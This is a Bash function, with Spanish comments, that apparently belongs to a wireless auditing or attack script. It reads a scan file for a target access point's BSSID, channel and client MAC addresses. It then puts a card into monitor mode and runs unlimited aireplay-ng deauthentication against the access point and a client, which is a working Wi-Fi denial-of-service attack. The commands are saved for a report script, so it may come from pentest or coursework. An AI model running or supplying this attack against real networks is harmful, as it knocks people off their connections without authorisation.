

```

DenegacionServicio() {
    echo "***** Denegacion de
Servicio*****"
    LINEA_ATAQUE=$LINEA_AUX
    LINEA_ATAQUE=$(head -$LINEA_ATAQUE "$ARCHIVO_REDES_SCAN" |
tail -1)
    BSSID=$(echo "$LINEA_ATAQUE" | awk -F "|" {' print $3 '})
    CANAL=$(echo "$LINEA_ATAQUE" | awk -F "|" {' print $4 '})
    ESSID=$(echo "$LINEA_ATAQUE" | awk -F "|" {' print $9 '})
    CLIENT=$(cat $ARCHIVO_CAPTURAS-clients.csv | grep $BSSID)
    TARJETA_SELECCIONADA_MAC=$(echo "$CLIENT" | awk -F "," {'
print $1 '})

    if [ ! `echo $TARJETA_SELECCIONADA_MAC | grep ":"` ]
    then
        #Utilizo mi propia interfaz para realizar falsa
autenticación
        TARJETA_SELECCIONADA_MAC=$(head -1 "$LOG_TARJETA" |
tail -1)
    else
        TARJETA_SELECCIONADA_MAC=$(echo "$CLIENT" | awk -F
",," {' print $1 '})
    fi

    TARJETA_MODO_MONITOR=$(head -1 "$ARCHIVO_TARJETA_MONITOR" |
tail -1)
    sudo airmon-ng stop $TARJETA_MODO_MONITOR

    TARJETAS_WIFI_DISPONIBLES=$(iwconfig --version | grep
"Recommend" | awk '{print $1}' | sort)
    INTERFAZ=$(echo $TARJETAS_WIFI_DISPONIBLES | awk '{print
$1}')
    sudo airmon-ng start $INTERFAZ $CANAL
    X1="airmon-ng start $INTERFAZ $CANAL"
    sleep 10s

    aireplay-ng -0 0 -a $BSSID $TARJETA_MODO_MONITOR
    X2="aireplay-ng -0 0 -a $BSSID $TARJETA_MODO_MONITOR"
    aireplay-ng -0 0 -a $BSSID -c $TARJETA_SELECCIONADA_MAC
$TARJETA_MODO_MONITOR
    X3="aireplay-ng -0 0 -a $BSSID -c $TARJETA_SELECCIONADA_MAC
$TARJETA_MODO_MONITOR"

    TIEMPO_ESCANE0="10"
    for A in `seq 1 $TIEMPO_ESCANE0`
    do
        sleep 1s
        if [ $A -eq $TIEMPO_ESCANE0 ]
        then
            sudo killall xterm
        else
            TIEMPO_RESTANTE=$(expr $TIEMPO_ESCANE0 - $A)
        fi
    done
}

```

```
#Comprobar la DOS

(sudo python "$RUTA_INFORME/SUBSDOS.py" "$X1" "$X2" "$X3"
"$X4")

sudo airmon-ng stop $TARJETA_MODO_MONITOR
sleep 5s
sudo airmon-ng start $INTERFAZ
}
```